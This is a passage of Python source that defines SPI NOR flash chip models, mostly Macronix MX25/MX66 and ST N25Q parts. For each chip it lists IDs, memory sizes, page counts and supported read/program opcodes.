SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class MX25L3273E(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2016
name = "mx25l3273e"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L4005(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2013
name = "mx25l4005"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L4005A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2013
name = "mx25l4005a"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class MX25L4005C(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2013
name = "mx25l4005c"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L4006E(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2013
name = "mx25l4006e"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L512(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2010
name = "mx25l512"
total_size = 65536 # bytes
page_size = 256 # bytes
total_pages = 256
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L51245(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x201a
name = "mx25l51245"
total_size = 67108864 # bytes
page_size = 256 # bytes
total_pages = 262144
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L51245G(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x201a
name = "mx25l51245g"
total_size = 67108864 # bytes
page_size = 256 # bytes
total_pages = 262144
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_1_4B,
SpiNorFlashOpCodes.PP_1_1_1_4B,
SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
]
dummy_bits = 8
class MX25L512E(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2010
name = "mx25l512e"
total_size = 65536 # bytes
page_size = 256 # bytes
total_pages = 256
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class MX25L6405(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2017
name = "mx25l6405"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L6405D(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2017
name = "mx25l6405d"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class MX25L6436E(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2017
name = "mx25l6436e"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L6445E(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2017
name = "mx25l6445e"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L6465E(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2017
name = "mx25l6465e"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L6473E(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2017
name = "mx25l6473e"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L6473F(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2017
name = "mx25l6473f"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L6495F(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x9517
name = "mx25l6495f"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L8005(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2014
name = "mx25l8005"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class MX25L8006E(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2014
name = "mx25l8006e"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L8008E(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2014
name = "mx25l8008e"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25LM51245(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x853a
name = "mx25lm51245"
total_size = 67108864 # bytes
page_size = 256 # bytes
total_pages = 262144
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_8,
SpiNorFlashOpCodes.PP_1_1_8,
]
dummy_bits = 8
class MX25R1035F(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2811
name = "mx25r1035f"
total_size = 131072 # bytes
page_size = 256 # bytes
total_pages = 512
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class MX25R1635F(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2815
name = "mx25r1635f"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class MX25R2035F(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2812
name = "mx25r2035f"
total_size = 262144 # bytes
page_size = 256 # bytes
total_pages = 1024
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class MX25R3235F(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2816
name = "mx25r3235f"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class MX25R4035F(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2813
name = "mx25r4035f"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class MX25R512F(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2810
name = "mx25r512f"
total_size = 65536 # bytes
page_size = 256 # bytes
total_pages = 256
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class MX25R6435F(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2817
name = "mx25r6435f"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25R8035F(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2814
name = "mx25r8035f"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class MX25U12835F(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2538
name = "mx25u12835f"
total_size = 16777216 # bytes
page_size = 256 # bytes
total_pages = 65536
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class MX25U1635E(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2535
name = "mx25u1635e"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class MX25U2033E(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2532
name = "mx25u2033e"
total_size = 262144 # bytes
page_size = 256 # bytes
total_pages = 1024
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class MX25U25635F(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2539
name = "mx25u25635f"
total_size = 33554432 # bytes
page_size = 256 # bytes
total_pages = 131072
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_1_4B,
SpiNorFlashOpCodes.PP_1_1_1_4B,
SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
]
dummy_bits = 8
class MX25U3235E(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2536
name = "mx25u3235e"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class MX25U3235F(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2536
name = "mx25u3235f"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class MX25U4035(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2533
name = "mx25u4035"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class MX25U51245G(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x253a
name = "mx25u51245g"
total_size = 67108864 # bytes
page_size = 256 # bytes
total_pages = 262144
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
SpiNorFlashOpCodes.READ_1_1_1_4B,
SpiNorFlashOpCodes.PP_1_1_1_4B,
SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
SpiNorFlashOpCodes.READ_1_1_4_4B,
SpiNorFlashOpCodes.PP_1_1_4_4B,
]
dummy_bits = 8
class MX25U6435E(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2537
name = "mx25u6435e"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class MX25U6435F(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2537
name = "mx25u6435f"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class MX25U8032E(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2534
name = "mx25u8032e"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25U8035(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2534
name = "mx25u8035"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class MX25V512(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2010
name = "mx25v512"
total_size = 65536 # bytes
page_size = 256 # bytes
total_pages = 256
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25V512C(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2010
name = "mx25v512c"
total_size = 65536 # bytes
page_size = 256 # bytes
total_pages = 256
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25V8005(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2014
name = "mx25v8005"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25V8035F(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2314
name = "mx25v8035f"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class MX66L1G45G(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x201b
name = "mx66l1g45g"
total_size = 134217728 # bytes
page_size = 256 # bytes
total_pages = 524288
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class MX66L1G55G(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x261b
name = "mx66l1g55g"
total_size = 134217728 # bytes
page_size = 256 # bytes
total_pages = 524288
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class MX66L51235F(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x201a
name = "mx66l51235f"
total_size = 67108864 # bytes
page_size = 256 # bytes
total_pages = 262144
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_1_4B,
SpiNorFlashOpCodes.PP_1_1_1_4B,
SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
]
dummy_bits = 8
class MX66L51235L(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x201a
name = "mx66l51235l"
total_size = 67108864 # bytes
page_size = 256 # bytes
total_pages = 262144
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
SpiNorFlashOpCodes.READ_1_1_1_4B,
SpiNorFlashOpCodes.PP_1_1_1_4B,
SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
SpiNorFlashOpCodes.READ_1_1_2_4B,
SpiNorFlashOpCodes.READ_1_1_4_4B,
SpiNorFlashOpCodes.PP_1_1_4_4B,
]
dummy_bits = 8
class MX66U51235F(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x253a
name = "mx66u51235f"
total_size = 67108864 # bytes
page_size = 256 # bytes
total_pages = 262144
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
SpiNorFlashOpCodes.READ_1_1_1_4B,
SpiNorFlashOpCodes.PP_1_1_1_4B,
SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
SpiNorFlashOpCodes.READ_1_1_2_4B,
SpiNorFlashOpCodes.READ_1_1_4_4B,
SpiNorFlashOpCodes.PP_1_1_4_4B,
]
dummy_bits = 8
class N25Q00(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0xba21
name = "n25q00"
total_size = 134217728 # bytes
page_size = 256 # bytes
total_pages = 524288
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class N25Q00A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0xbb21
name = "n25q00a"
total_size = 134217728 # bytes
page_size = 256 # bytes
total_pages = 524288
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class N25Q016(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0xbb15
name = "n25q016"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class N25Q016A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0xbb15
name = "n25q016a"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class N25Q032(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0xba16
name = "n25q032"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class N25Q032XX1E(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0xbb16
name = "n25q032..1e"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class N25Q032XX3E(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0xba16
name = "n25q032..3e"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class N25Q032A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0xbb16
name = "n25q032a"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class N25Q064(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0xba17
name = "n25q064"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class N25Q064XX1E(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0xbb17
name = "n25q064..1e"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class N25Q064XX3E(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0xba17
name = "n25q064..3e"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class N25Q064A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0xbb17
name = "n25q064a"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class N25Q128(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0xba18
name = "n25q128"
total_size = 16777216 # bytes
page_size = 256 # bytes
total_pages = 65536
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class N25Q128A11(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0xbb18
name = "n25q128a11"
total_size = 16777216 # bytes
page_size = 256 # bytes
total_pages = 65536
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class N25Q128A13(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0xba18
name = "n25q128a13"
total_size = 16777216 # bytes
page_size = 256 # bytes
total_pages = 65536
supported_opcodes = [
